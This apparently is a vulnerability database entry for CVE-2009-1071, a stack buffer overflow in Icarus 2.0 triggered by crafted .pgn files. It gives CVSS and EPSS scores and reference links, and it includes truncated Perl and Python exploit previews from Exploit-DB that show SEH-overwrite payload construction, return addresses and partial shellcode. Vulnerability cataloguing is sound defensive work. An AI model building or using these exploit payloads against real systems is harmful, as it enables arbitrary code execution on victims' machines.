CVE-2009-1071
Published 2009-03-26
Priority P344 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.03% (92.4th percentile)
Stack-based buffer overflow in Icarus 2.0 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted Portable Game Notation (.pgn) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| randomsoftware | icarus | — | — |
No detection rules found.
Exploit-DB
Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)
exploitdb·2009-09-10
---
```perl
#!/user/bin/perl
#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)
#tested on win SP2
#origenal exploit : http://milw0rm.com/exploits/8236
#Author: germaya_x & D3v!LFUCK3R
#Download :http://www.randomsoftware.com/pub/icarus.exe
#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)
#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com :)
#############################################################
my $bof="A" x 332 ;
my $NEXT_sEh="\xEB\x06\x90\x90";
my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x4
```
Exploit-DB
Icarus 2.0 - '.pgn' Local Stack Overflow (SEH)
exploitdb·2009-03-18
---
```python
#usage: exploit.py
print "********************************************************************"
print " Icarus 2.0 Local Stack Overflow Exploit\n"
print " Download: http://www.randomsoftware.com/pub/icarus.exe"
print " Author : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print " Tip of the day: Klimontayne fe romayne :D"
print "********************************************************************\n\n"
payload1 = "\x41" * 336
payload1 += "\x5D\x38\x82\x7C" # call esp kernel32.dll (sp2)
payload1 += "\x90" * 19 #some nops
payload1 += "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
payload1 += "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\
```
No writeups or analysis indexed.
http://osvdb.org/52780
http://secunia.com/advisories/34368
http://www.securityfocus.com/bid/34167
https://exchange.xforce.ibmcloud.com/vulnerabilities/49309
https://www.exploit-db.com/exploits/8236